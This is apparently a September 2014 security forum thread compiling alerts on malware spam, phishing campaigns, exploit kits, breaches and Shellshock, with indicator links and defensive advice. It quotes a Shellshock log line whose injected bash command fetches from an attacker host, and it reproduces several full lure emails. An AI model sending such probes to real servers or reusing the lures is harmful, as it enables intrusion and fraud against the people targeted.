You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link ...
The link to this secure message will expire in 24 hours ...

The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
* https://www.virustotal.com/en-gb/file/2008078314022b0bf08cc1e2a23420ec4f7caab95e00e020ecf07b7c01dbfa35/analysis/1411464313/

** http://anubis.iseclab.org/?action=result&task_id=1ac4290d6f92ed1044d41585aeff6b27a&format=html

- http://myonlinesecurity.co.uk/new-voice-fake-pdf-malware/
23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr Current Virus total detections: 2/54*
* https://www.virustotal.com/en-gb/file/2008078314022b0bf08cc1e2a23420ec4f7caab95e00e020ecf07b7c01dbfa35/analysis/1411464313/
___

jQuery.com compromised to serve malware via drive-by download
- http://www.net-security.org/malware_news.php?id=2869
23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromised happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediately re-imaging of the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
* http://www.riskiq.com/resources/blog/jquerycom-malware-attack-puts-privileged-enterprise-it-accounts-risk

>> https://blog.malwarebytes.org/?s=RIG+exploit+kit

- https://isc.sans.edu/diary.html?storyid=18699
2014-09-23

46.182.31.77: https://www.virustotal.com/en/ip-address/46.182.31.77/information/
___

Nuclear Exploit Kit evolves, includes Silverlight Exploit
- http://blog.trendmicro.com/trendlabs-security-intelligence/nuclear-exploit-kit-evolves-includes-silverlight-exploit/
Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit exploit kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
Timeline of exploits used by the Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/2-Nuclear-Exploit-Kit-Timeline-01.jpg
Vulnerabilities targeted by the current Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/nuclearexploit_fig4.png
... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0074 - 9.3 (HIGH)

:mad: :fear::fear:

AplusWebMaster
2014-09-24, 13:25
FYI...

Fake BankLine SPAM
- http://blog.dynamoo.com/2014/09/you-have-received-new-secure-message.html
24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
From: Bankline [secure.message@ bankline .com]
Date: 24 September 2014 09:59
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
First time users - will need to register after opening the attachment...

The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
* https://www.virustotal.com/en-gb/file/2ae91a34c322641a86239ab97ba8995e0e188d67ebd5e472825e53d7b53585eb/analysis/1411546325/

** https://anubis.iseclab.org/?action=result&task_id=1d5af02378c37a5b47d2e9524c46863ef&format=html

- http://myonlinesecurity.co.uk/received-new-secure-message-bankline-fake-pdf-malware/
24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
Current Virus total detections: 7/54*..."
* https://www.virustotal.com/en/file/2ae91a34c322641a86239ab97ba8995e0e188d67ebd5e472825e53d7b53585eb/analysis/1411565004/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Voice mail SPAM
- http://myonlinesecurity.co.uk/inclarity-net-voice-message-attached-01636605058-name-unavailable-fake-wav-malware/
24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Time: Sep 23, 2014 10:50:00 AM
Click attachment to listen to Voice Message

24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to: 01636605058_20140919_105000.wav.exe
Current Virus total detections: 12/53*
This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( (sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/490f83b60921c80a4666ff9b546ce0a233199949d4a00a6035178fa685debbfb/analysis/1411568872/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake 'overdue invoice' SPAM – malware
- http://myonlinesecurity.co.uk/reminder-overdue-invoice-malware/
24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
Reminder of overdue invoice: 708872110964932
Overdue Payment: 122274492356288
Due Date E-Mail Reminder: 417785972641224
Payment reminder: 461929101577209
Past Due Reminder Letter: 199488661953143
Bills Reminder: 325332051074690
Automatic reminder: 676901889653218
Late payment: 475999033756578
Reminder: 215728756825356
The email looks like:
Hello,
This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
Account ID: 5FCDMF9. This notice is a reminder your payment is due.
Regards,
Rex Gloeckler
Olympus Industrial...

24 September 2014: application_708872110964932_5FCDMF9.rar:
Extracts to: application_708872110964932_5FCDMF9.exe
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/de2012097279e862bde5f4ffc8e649ede75400aa7c2afd6b343998c91657968f/analysis/1411570178/
... Behavioural information
TCP connections
157.56.96.53: https://www.virustotal.com/en/ip-address/157.56.96.53/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.97: https://www.virustotal.com/en/ip-address/95.101.0.97/information/
213.186.33.17: https://www.virustotal.com/en/ip-address/213.186.33.17/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
___

Fake AMEX Phish - 'Home Depot Security concern'
- http://myonlinesecurity.co.uk/american-express-security-concern-data-breach-home-depot-phishing/
24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims accounts to scare you into ignoring the usual precautions and get you to give them your details:
* http://www.cnbc.com/id/102027452
Email looks like:
[ AMEX logo ]
Dear Customer:We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
To ensure the safety of your account , please log on to : ...
Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
Switch to Paperless Statements that are accessible online through your password-protected account.
Your prompt response regarding this matter is appreciated.
Sincerely,
American Express Identity Protection Team ...

Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected or having your details stolen by this sort of socially engineered malware..."
** http://myonlinesecurity.co.uk/how-to-protect-yourself-and-tighten-security/

- http://threattrack.tumblr.com/post/98321608223/american-express-home-depot-credentials-phish
Sep 24, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/094c409ba72f53cb124310343c3a213b/tumblr_inline_ncf48aKPiQ1r6pupn.png
Tagged: AMEX, American Express, Home Depot, Credentials Phish
___

Netcraft Sep 2014 Web Server Survey
- http://news.netcraft.com/archives/2014/09/24/september-2014-web-server-survey.html
24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
___

Viator(dot)com - Data Compromise ...
- https://blog.malwarebytes.org/online-security/2014/09/viator-com-data-compromise-are-you-affected/
Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
* http://www.viator.com/about/media-center/press-releases/pr33251
Sep 19, 2014

... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
___

Malvertising campaign - involving DoubleClick and Zedo
- https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/
Sep 18, 2014
Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."

- http://arstechnica.com/security/2014/09/google-stops-malicious-advertising-campaign-that-could-have-reached-millions/
Sep 22 2014

:mad: :fear:

AplusWebMaster
2014-09-25, 15:28
FYI...

Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-rbs-bacs-transfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.

RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
From: Riley Crabtree [creditdepart@ rbs .co.uk]
Date: 25 September 2014 10:58
Subject: BACS Transfer : Remittance for JSAG814GBP
We have arranged a BACS transfer to your bank for the following amount : 4946.00
Please find details at our secure link ...

Sage Account & Payroll: "Outdated Invoice"
From: Sage Account & Payroll [invoice@ sage .com]
Date: 25 September 2014 10:53
Subject: Outdated Invoice
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...
Screenshot: https://1.bp.blogspot.com/-8Mx-CTYIitE/VCPrdXzlOiI/AAAAAAAAFvA/YGCgcp8GX2s/s1600/sage2.png

Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 25 September 2014 11:36
Subject: Important - Commercial Documents
Important account documents
Reference: C400
Case number: 05363392
Please review BACs documents.
Click link below ...

NatWest Invoice: "Important - New account invoice
From: NatWest Invoice [invoice@ natwest .com]
Date: 25 September 2014 10:28
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here ...

The links in the emails go to different download locations to make it harder to block... In each case the page then downloads the victim to download file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustotal.com/en-gb/file/1397ff56e47b642ff1f4eaaaedc3b84fc5cd7c619b25a894a57dabe62987d84c/analysis/1411638249/
... Behavioural information
DNS requests
ukrchina-logistics .com
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
91.196.0.119

- http://threattrack.tumblr.com/post/98386009528/sage-software-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c600697c85ad23d80119101ea06360d0/tumblr_inline_ncglljx1ql1r6pupn.png
Tagged: Sage, Upatre
___

Fake BCA SPAM - PDF malware
- http://myonlinesecurity.co.uk/bca-banking-24-09-14-fake-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Accounts Dept
Halls Holdings Ltd
Tel: 01743 450700
Fax: 01743 443759 ...

25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53* . This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cfd9d4f6fc16e6cf4f5960b5c1b3ad5724f86ec0eefd6e87ab154c4b1e156443/analysis/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/outlook-received-voice-mail-fake-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE7838396453.wav (26 KB)
Caller-Id: 7838396453
Message-Id: ID9CME
Email-Id: [redacted]
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c97b0291ac92a49293a1c8e5a9145241d2e09f9b53df8c13c70ca33701090773/analysis/1411657167/
... Behavioural information
TCP connections
23.21.52.195: https://www.virustotal.com/en/ip-address/23.21.52.195/information/
95.100.255.137: https://www.virustotal.com/en/ip-address/95.100.255.137/information/
194.150.168.70: https://www.virustotal.com/en/ip-address/194.150.168.70/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Gov't e-mail SCAM
- https://www.ic3.gov/media/2014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3... Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states... If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."

:fear::fear: :mad:

AplusWebMaster
2014-09-26, 14:58
FYI...

Amazon phish ...
- http://myonlinesecurity.co.uk/amazon-account-confirmation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Amazon-Account-Confirmation.png

Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___

Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

Employee Documents - Internal Use
From: victimdomain
Date: 26 September 2014 09:41
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...

You have a new voice
From: Voice Mail [Voice.Mail@ victimdomain]
Date: 26 September 2014 09:30
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...

RBS: BACS Transfer : Remittance for JSAG244GBP
From: Douglas Byers [creditdepart@ rbs .co.uk]
Date: 26 September 2014 10:12
Subject: BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...

New Fax
From: FAX Message [fax@victimdomain]
Date: 26 September 2014 10:26
Subject: New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...

... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/9819d4027893bcb20cdefc49632008e71672fb3eaefbbb0ef1b626a52dd6c6c4/analysis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
184.106.55.51: https://www.virustotal.com/en-gb/ip-address/184.106.55.51/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
___

Bill.com Spam
- http://threattrack.tumblr.com/post/98466527048/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
Payment Details [Incident: 711935-599632]
Typical e-mail details:
We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
Regards,
Bill.com Payment Operations

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d0ecbce8726c0f09eda8b8e4dbc7c45/tumblr_inline_ncigloYHaW1r6pupn.png

Malicious File Name and MD5:
bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)

Tagged: bill.com, Vawtrak
___

More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-hmrc-taxes-application.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* at this earlier spam run*.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From: noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date: 26 September 2014 12:26
Subject: HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...

Important - BT Digital File
From: Cory Sylvester [Cory.Sylvester@ bt .com]
Date: 26 September 2014 12:51
Subject: Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...

RBS Bankline: Outstanding invoice
From: Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
To: <REDACTED>
Date: 26 September 2014 13:05
Subject: Outstanding invoice
{_BODY_TXT}
Dear [redacted],
Please find the attached copy invoice which is showing as unpaid on our ledger.
To download your invoice please click here ...

In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
___

Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barclays-transaction-complete-fake-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Unable to complete your most recent Transaction. Currently your transaction has a pending status.
If the transaction was made by mistake please contact our customer service.
For more details please download payment receipt ...

26 September 2014: PaymentReceipt262.zip: Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5149eb19e642e141818326b4ad670e9b74496881ea1de69c13786f021efda559/analysis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
195.110.124.133: https://www.virustotal.com/en/ip-address/195.110.124.133/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/

:mad: :fear::fear:

AplusWebMaster
2014-09-28, 13:32
FYI...

Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo.com/2014/09/evil-network-shellshock-and-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/Russians_in_Moldova

** http://pastebin.com/2mC1pXaJ

83.166.234.186: https://www.virustotal.com/en/ip-address/83.166.234.186/information/

83.166.234.133: https://www.virustotal.com/en/ip-address/83.166.234.133/information/
___

Shellshock in the Wild
- http://www.fireeye.com/blog/uncategorized/2014/09/shellshock-in-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)

- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.org/security/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redhat.com/articles/1200223
CentOS: http://centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html
Novell SUSE: http://support.novell.com/security/cve/CVE-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues.
- https://rhn.redhat.com/errata/RHSA-2014-1306.html
Last updated on: 2014-09-30
If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."

:fear::fear: :mad:

AplusWebMaster
2014-09-29, 18:40
FYI...

Fake SITA SPAM - PDF malware
- http://myonlinesecurity.co.uk/sita-uk-remittance-advice-fake-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in the statement.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...

Update: a slightly revised email coming out now but still the -same- malware attachment
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in statement.
Any queries please contact us on 01934-524004.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...

29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55* . This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d8a6c8626cab8f4588254ce0d48460e9968ede774cc7c5b2b756ce4055e39d1d/analysis/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoice-complete-office-solutions-fake-xls-malware/
29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk

29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54* . This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
